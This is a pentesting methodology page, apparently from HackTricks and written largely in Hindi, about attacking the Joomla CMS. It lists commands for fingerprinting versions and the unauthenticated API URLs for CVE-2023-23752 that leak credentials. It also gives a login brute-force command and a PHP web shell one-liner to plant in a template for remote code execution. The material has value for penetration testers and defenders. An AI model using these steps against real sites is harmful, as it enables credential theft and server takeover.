Joomla
Reading time: 4 minutes
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
Joomla Statistics
Joomla कुछ गुमनाम उपयोग सांख्यिकी एकत्र करता है जैसे Joomla, PHP और डेटाबेस संस्करणों और Joomla इंस्टॉलेशन पर उपयोग में सर्वर ऑपरेटिंग सिस्टम का विभाजन। इस डेटा को उनके सार्वजनिक API के माध्यम से क्वेरी किया जा सकता है।
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}
Enumeration
Discovery/Footprinting
- Check the meta
curl https://www.joomla.org/ | grep Joomla | grep generator
<meta name="generator" content="Joomla! - Open Source Content Management" />
- robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
- README.txt
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
संस्करण
- In /administrator/manifests/files/joomla.xml you can see the version.
- In /language/en-GB/en-GB.xml you can get the version of Joomla.
- In plugins/system/cache/cache.xml you can see an approximate version.
स्वचालित
droopescan scan joomla --url http://joomla-site.local/
In 80,443 - Pentesting Web Methodology एक अनुभाग है जो CMS स्कैनर्स के बारे में है जो Joomla को स्कैन कर सकते हैं।
API अनधिकृत जानकारी का प्रकटीकरण:
संस्करण 4.0.0 से 4.2.7 अनधिकृत जानकारी के प्रकटीकरण (CVE-2023-23752) के प्रति संवेदनशील हैं जो क्रेड्स और अन्य जानकारी को डंप करेगा।
- उपयोगकर्ता:
http://<host>/api/v1/users?public=true
- कॉन्फ़िग फ़ाइल:
http://<host>/api/index.php/v1/config/application?public=true
MSF मॉड्यूल: scanner/http/joomla_api_improper_access_checks
या रूबी स्क्रिप्ट: 51334
ब्रूट-फोर्स
आप इस स्क्रिप्ट का उपयोग लॉगिन को ब्रूट फोर्स करने का प्रयास करने के लिए कर सकते हैं।
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
admin:admin
RCE
यदि आप admin credentials प्राप्त करने में सफल हो गए हैं, तो आप RCE अंदर PHP कोड का एक स्निपेट जोड़कर RCE प्राप्त कर सकते हैं। हम इसे template को कस्टमाइज़ करके कर सकते हैं।
Templates
पर क्लिक करें जोConfiguration
के तहत नीचे बाईं ओर है ताकि टेम्पलेट मेनू खुल सके।- एक template नाम पर क्लिक करें। आइए
protostar
कोTemplate
कॉलम हेडर के तहत चुनते हैं। यह हमेंTemplates: Customise
पृष्ठ पर ले जाएगा। - अंत में, आप एक पृष्ठ पर क्लिक कर सकते हैं ताकि पृष्ठ स्रोत खुल सके। आइए
error.php
पृष्ठ चुनते हैं। हम कोड निष्पादन प्राप्त करने के लिए एक PHP one-liner जोड़ेंगे जैसा कि निम्नलिखित है: system($_GET['cmd']);
- Save & Close
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
From XSS to RCE
- JoomSploit: Joomla शोषण स्क्रिप्ट जो XSS को RCE या अन्य महत्वपूर्ण कमजोरियों में बढ़ाती है। अधिक जानकारी के लिए इस पोस्ट की जांच करें। यह Joomla संस्करण 5.X.X, 4.X.X, और 3.X.X के लिए समर्थन प्रदान करता है, और अनुमति देता है:
- Privilege Escalation: Joomla में एक उपयोगकर्ता बनाता है।
- (RCE) Built-In Templates Edit: Joomla में एक Built-In Templates को संपादित करता है।
- (Custom) Custom Exploits: तृतीय-पक्ष Joomla प्लगइन्स के लिए कस्टम शोषण।
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।